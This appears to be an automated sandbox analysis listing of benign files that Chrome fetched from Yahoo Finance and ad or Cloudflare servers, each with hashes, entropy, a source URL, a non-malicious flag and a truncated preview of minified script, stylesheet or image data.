                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FB0DB4BF4549D73F483EC92B77C7D49FEC2EE5C1E1FEDBF311FED145FB3164D493E604442AFD2AA69D35597F901D252A6F1BDC912CBE9B363869B8F60EE97AE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/CDS.DMTRQPpt.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var r=(o=>(o.footer="yfinance:editorialFooterTopics",o.stockStoryTopPics="yfinance:stockStoryTopTickers",o))(r||{});export{r as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4698)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.322936178286471
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:idxotGX+4fR1pjXc1kSZGiDSpNOFU01Yf8DR+Q4k4z5cqgxrWHG9U9Ln+4qZYzla:mxoUXHf7pXqEiDSpNOFU01Yf8d+Qh423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BF16C6A984153FBD31CB5EE10407AFC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FDDD9FE01B3CE47CD64B6A048A15E45B638CAF2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C8CBC35919933AFAB21AFDBF036F310189E58B0FFBD2B045FF8E43F8F36CA01B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3721C3607DC73F82E0777BB040B643135E495F720428BFC3DA98F64DF655023B2871541292D191B379AA50A49B53E8C6BCAABA4DDA5BED297581DD94D2729A2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:var K=Object.defineProperty;var T=(t,e,n)=>e in t?K(t,e,{enumerable:!0,configurable:!0,writable:!0,value:n}):t[e]=n;var I=(t,e,n)=>(T(t,typeof e!="symbol"?e+"":e,n),n);import{n as w,ai as W,i as V,aj as X,v as E,a0 as O,Q as j,ak as Y,a1 as N,af as Q,f as Z,al as tt,am as et,an as nt,ah as it,ag as U,ao as st,ap as rt,aq as at,ar as ft,as as ot}from"./scheduler.Dr9AAxFe.js";const G=typeof window<"u";let q=G?()=>window.performance.now():()=>Date.now(),B=G?t=>requestAnimationFrame(t):w;const k=new Set;function H(t){k.forEach(e=>{e.c(t)||(k.delete(e),e.f())}),k.size!==0&&B(H)}function D(t){let e;return k.size===0&&B(H),{promise:new Promise(n=>{k.add(e={c:t,f:n})}),abort(){k.delete(e)}}}const P=new Map;let R=0;function ut(t){let e=5381,n=t.length;for(;n--;)e=(e<<5)-e^t.charCodeAt(n);return e>>>0}function lt(t,e){const n={stylesheet:X(e),rules:{}};return P.set(t,n),n}function z(t,e,n,s,u,a,l,i=0){const c=16.666/s;let r=`{.`;for(let $=0;$<=1;$+=c){const m=e+(n-e)*a($);r+=$*100+`%{${l(m,1-m)}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1650
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.159978002033735
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:tCbYLbGPGuXVGTTGzGeLGSoGQlnGMGl8YolNBa4xYZHnRDaHjjOtKwS7xDSyFYxT:Di+huqUGSbQMHmlNQulQKxM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:03C10F2C4E36A75805F7735D1F07C98C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DAEF61F97758BEF6CE593D34998F5F8EA7E20E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F7D51EA19F78212DBF64706C7CCEB771E3D7B6390057BD4E44355B2850B1DA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:26C726B47435AAF67BA01633AA75F50E48718A494FF19C0E2BD9AD58D070508AE9C8A14255EA0BF5A754BFBA2F6C4BD4D20632A31464478DF74EE68F10C59465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/weather-svg/MOSTLY_SUNNY.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="-36.396%" y1="32.854%" x2="33.396%" y2="133.313%" id="a">. <stop stop-color="#FFF5B2" offset=".013%"/>. <stop stop-color="#FFDE00" offset="39.944%"/>. <stop stop-color="#FFA700" offset="100%"/>. </linearGradient>. <linearGradient x1="115.053%" y1="97.289%" x2="115.053%" y2="-17.557%" id="b">. <stop stop-color="#FFB92B" stop-opacity=".05" offset="0%"/>. <stop stop-color="#FF6900" offset="100%"/>. </linearGradient>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="c">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M20.464 26.12c-4.225-.75-8.257 2.1-9.051 6.396a5.422 5.422 0 00-5.252 2.062 5.67 5.67 0 00-.693 5.694 3.006 3.006 0 002.792 1.727h10.855c4.085.022 7.5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.644446797383186
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:CNZ+hP/j51cjYNkLiXIoSnG2IeI/+qN3MqVXzSE1:gZ+h3l+JnGNeI/+WtXzj1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:7C26035030611F0DF43992C6BD5F27E2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6480A11B90BF6027224D2687A1D1BFA397C91257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4C30B9D0FC3A81B47DCCEB346C83D0516BE8C74DEF7AB6B20CB34B82841C122E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E523CF3650147B450F596F3B3B820E1DC0B09A0EF22FACF6F07261F4C7DF888EA75D189BF39967001395C670BE96FAE16DAB53F80009989C7B7D601EAF0F791D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.=n.A....!..q.$..8.. ....". 9@+v.\...p..D...xg...n..v../YM...f.W.....1.......Q~,."K..............A>...U.......6[......5..?,./`sw.K...L.,....N^.v.......]...,.t.A~+..,...3...h....*,.1....PX....";..Bj* ...$.].,.W=V..nh:,....H..dv...mqO.."..\|..4t...q...uM%....p,...J.'P.K3..P.(.K.A..P(..r.P.C.AI....*.'n..@I.....?o........FP..$...:I.....O...N.?..;OQ....X..{.*.....9....?.x..>X..y..a.......%.>x.:J..W+....... .T......Jx.0(..yj.3.....;..j..-._r.WXX...^.P...E..e5x..yR.s.......C.`.4.G.jaQ....b.r)p.E.....b..)p.E..d.A~. .(h.kST.J..ab....MQ-,..~1..J..u....=.@.(.........!(..k<T..y......5.....psP...TO....<.psP...=.....CN..S...e....r.x...>.._wc.......P..?..y.a.(....p.......K.......h_.k......Q.....m.....k.)(..N.M.%-.<J..../',.....2../.k....F.a..6...PK..]..5......1.......IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2222)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.396200966239423
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:/xEVUMByh/fa6cSOUkxHT72sDWB75/0D0PmfDpl2yk/Z7SNJQ0Wu3PI3Prx/ttoI:hRS6cbHTi7iFkOvLbAN9gzRON1Rxwi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1C33A4D6D63C7E6E38CC72E6245FC107
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:19EA40DED1698EC0617604DC3E09897F7A8FF640
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:435DB380C9936C0970DCD3D9941EAB6AEC2FCF2A38C3E2B4E02D957E8E76BD1F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA55321C3C847819553238850525E59C6ED5C37BCA116358D5080971037E56A3407D256B6A78DBE38F4B91CC97E62D899296C620F80701598983BA0624E086E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Aa=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Aa};var c="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",d=0,e=function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):131
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.595878558146338
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:KENUeMZe1MAyPLKH57seBuPsRUeWL6DfIXa+hDI6:KLppLKZ7svsR2L6GZU6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2B404CCA8D1467304AEC2AA163C0D24E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4C16BB5F9696D01C57FEA8F55DD5BC94C83B6BC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:59A421B36CEB262C596D30D987B84F522175D755B77C30A94F2D8E73EE8C5638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:0A869CA7B582417F21FFE3DA867D946DA1377306B53E44E8B6EEE34044EE170D26FE8EE2FE3C9668DD4A99BDD26F0DD4026AE52CA058F202ABBC00E23E4064AE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/DataTable.DTaxQPTv.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:p.yf-8r8tzo{font-size:var(--font-m);white-space:nowrap;overflow:hidden;text-overflow:ellipsis;font-weight:var(--font-weight-bold)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (47459)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.397735966179774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:mLCcfjNm527JH/2V9d7ch8QMQvjdDdSzCTLo5RP8X60Yo6z63H1KCZwinCb+I298:mxNmeJH/e9d7cqK+CT0Q6zmL8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5D332FD1AE9FEB79A10425DFC3F84FE4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C7D7F9D2BF5EE08E242765803CDD3A223FE1CBFC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2EA786910282DF7AE154A0011375CD1254ADBD8EF0E75EB62177ADA67DAF9611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:01CDAC8103290B0FC1BF9BE8EE3923BFA6B8AD7778FF6B4716E421D6BBB3382240D9316B9994D6F4EA87E67DA9791EB8E3E2A1AAF81DBD749B3C8D7778E15F20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/62ec4f065604/api.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var f=e[l](h),p=f.value}catch(s){n(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(p){Wt(l,o,c,h,f,"next",p)}function f(p){Wt(l,o,c,h,f,"throw",p)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2159552326688825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:C/2A3njBlJQ3iFZ++GVDDBMu/xon:C/nXjBlJ9Fc+G7q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:741CCA5F0A6985FA14BEB373A2071A96
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1F28516565B02F1ADF3564FF70167376D6CAFEF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C6741375697ACE7E3AF7F38F3BF8B465D38276E52BFF3BEE34C28617AAB0746A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6002F706F253981EEDB25D2C123288F4BD7F58CBA115944F2FF71C970092D9F4F42A30280EBAD7713D991DC3ACF3F13C68CE585B8CE005D4AF1BD7AD1ABFF5B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.advBidxc.mnetRtusId({"status":"OK","userid":"xog5Sg9jXAp-UdSwxfWa4id90qy9mR2D"});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (26297)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):81264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4415348577140366
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:JyKb+RL6DqK9cdmcRURCHZRaycS3HZysOJ5VkONnw6yCw8zHO9ZHXB8cTcT2/MT:JgB6DqfjRz3wsg5CONw6yCw8zH0ZA2y
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:FB7E83DA3741C5DABB52B769F6A51A6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2279080E6867D867873DC5C1BF0CA5F9BC020D40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:6437CD655A5C8AC45A727DD5C7C844EEBE56DCAE23F08894AD7E5D604521811D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FBC21790A722C0DFCBD9B214286C6E173368911CB800CA58EE439A68097AAD691965D1E5FC6CAA3C4C06C84D6C7A60E36015C96C36381290C9EF0F954914B00A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://static.adsafeprotected.com/sca.17.6.4.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/* .json2.js.2014-02-04.Public Domain..NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK..See http://www.JSON.org/js.html.This code should be minified before deployment..See http://javascript.crockford.com/jsmin.html...JavaScript MD5.https://github.com/blueimp/JavaScript-MD5.Copyright 2011, Sebastian Tschan.https://blueimp.net.Licensed under the MIT license:.http://www.opensource.org/licenses/MIT.Based on.A JavaScript implementation of the RSA Data Security, Inc. MD5 Message.Digest Algorithm, as defined in RFC 1321..Version 2.2 Copyright (C) Paul Johnston 1999 - 2009.Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet.Distributed under the BSD License.See http://pajhome.org.uk/crypt/md5 for more info....base64 encode library from http://www.webtoolkit.info/.distrubted under creative commons license 2.0:.https://creativecommons.org/licenses/by/2.0/uk/.*/..window.zyx123bldtmstp=1715618633,window["87809293129bldvrsn1715618633"]="17.6.4",window.pou987bldnm="sca",window["6789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (33589), with LF, NEL line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):58753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.26167812703519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:y5B9KXqe7mdOgKY0hXpXVG8FoAKRXSdRKftld0VTScQI8rdFj8:EB9K6d8gghXnyXSuVld4z8Z6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A9C11221224C7869C6B916618D892612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:39C436EE6D2AFD6F851840AB4673C56CE0372D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7B48A74FA0F94D83AE6D60C772F5E7AA66E7BE1B63CCF223CA14E34D3D7B0D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EA05BD1555D819AA35985D16EDA15F9A3805DA01F192156157739E30CE2A22D2888F8E4D1A2ED7A3FC2739CEF848B7EE882A5A628B3657E27AF979FE8F0EB09D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://hbx.media.net/pubcid.php?itype=HB&cb=window.advBidxc.mnetCoRtusId
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:try{ window.__mNPubCidCB = window.advBidxc.mnetCoRtusId ;/*. * This Source Code Form is subject to the terms of the Mozilla Public. * License, v. 2.0. If a copy of the MPL was not distributed with this file,. * You can obtain one at https://github.com/conversant/pubcid.js/blob/master/LICENSE. * Original github code https://github.com/conversant/pubcid.js. */.!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (8038)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8039
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.486770517057192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:tHy8y/LYhr+Yujso8nxuhdPcDS+ZMqfJErXYoBo3Lq2qJysfGBPqVqiLPaIqI3VY:tS8y/shAI8PQFGXnB6ejJysfGBiEiLPO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E33983E6FFB533453DF21766BACCB20E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2E3B3EBA7F3EB96F1113E2D9CCE6FDEDF0C6416C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DF1838F810AF1CC5D3205BB5937CA805F3EE5E21460C48455C008DC2945382F8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EAA1B9A5C49BCFAEC2F945C9FCE21E96003E594F059495FC028C09965350E936C0FC5390DEB36C66BEBCCDE456C750D92BFCB411D9F253092C4F6B8A3071883B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as ve,A as H,P as te,a0 as ke,e as T,b as ne,d as Y,f as G,j as le,i as E,q as h,_ as F,k as J,l as R,G as Ie,R as ze,Y as y,O as Ee,I as Be,T as Ae,c as se,u as ie,g as oe,a as ae,a6 as p,t as De,h as Se}from"./scheduler.Dr9AAxFe.js";import{S as Fe,i as Pe,h as qe,c as fe,b as ce,m as ue,t as C,g as me,a as N,e as de,d as re}from"./index.DCSmZEjO.js";import{g as Le,a as je}from"./spread.CgU5AtxT.js";import{B as ge}from"./Button.DpT5MMuf.js";import{t as w}from"./commonUtil.CI22_Irn.js";import{C as Ve}from"./close.C3ug6nNR.js";import{c as Te,o as Ye,f as Ge,s as Re}from"./floating-ui.dom.C5fi-pG6.js";const He=e=>({isDisplayed:e[0]&524288}),x=e=>({isDisplayed:e[19]});function Je(e){let t;const n=e[31].default,s=se(n,e,e[34],null);return{c(){s&&s.c()},l(o){s&&s.l(o)},m(o,a){s&&s.m(o,a),t=!0},p(o,a){s&&s.p&&(!t||a[1]&8)&&ie(s,n,o,o[34],t?ae(n,o[34],a,null):oe(o[34]),null)},i(o){t||(C(s,o),t=!0)},o(o){N(s,o),t=!1},d(o){s&&s.d(o)}}}function $(e){let t,n,s=e[3]&&ee(e);const o=e[31].c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1473)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1474
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.442418925457835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:TNIIYW+h4XU6cRX+8DwWm0ZzStj4Z4hIl2Va+D23Xe8JBXM+FrLSdHCPzCppVKcb:TN9YW+hVPtwWJKfyTFrLUotEiGwGbNf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A66BACFC1DE7AE6219E9D661DD0178AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:710E49D7E87995695973021FB124C2030B6DE465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F392767BBC070DA0335CFB985A26F5FF14FC7003F0E775D8383813FD311BC4E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:82F75F9BEECCC86F991E3BA583A2AEE37378058FC86FDE5CE9C5BF84C3F7277051884F8426ADFF3AC545A554633A0008380461AC201F28879AD740055732C099
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadQSPLeafNews.lDua51cx.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{e as A,d as Q}from"./commonUtil.CI22_Irn.js";import{n as T,g as C}from"./utils.QCnxU1jw.js";import{l as M}from"./initializePage.CM9yuY0O.js";import{l as v}from"./loadQuote.D9BAmXuK.js";import{l as E}from"./logUtil.hOue7iAU.js";const r={count:250,imageTags:["170x128"],thumbnailSizes:["170x128"],spaceId:void 0,adsSectionId:void 0};async function j(t,{fetchQuoteData:u=!1,listName:n="",isPagination:P=!1,imageSize:b,...a}={listName:""}){var f;const[c,[h,s,w]]=await Promise.all([A(t),Q(["config","ncpStreams","crumb"],t)]),{ads:k={},i13n:y}=h.getPageConfig()??{},{adsSectionId:m}=k||{};m&&(r.adsSectionId=m);const{spaceid:d}=y||{};d&&(r.spaceId=d);const{imageTags:g=[]}=a;g.length&&(a.adsImageTags=g);const{s:I,...L}=a,o=n,l={key:"ncp_fin",...r,adsEnabled:!w.isAdLite,listName:n,perfLabel:`loadQSPLeafNews:${n}`,...L};a.s&&a.s.length&&(l.s=I),s.initializeStream(o);try{const i=await M(t,l),{stream:e,pagination:z}=((f=i==null?void 0:i.data)==null?void 0:f.tickerStream)||{};if(e){const S=T(e,c.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
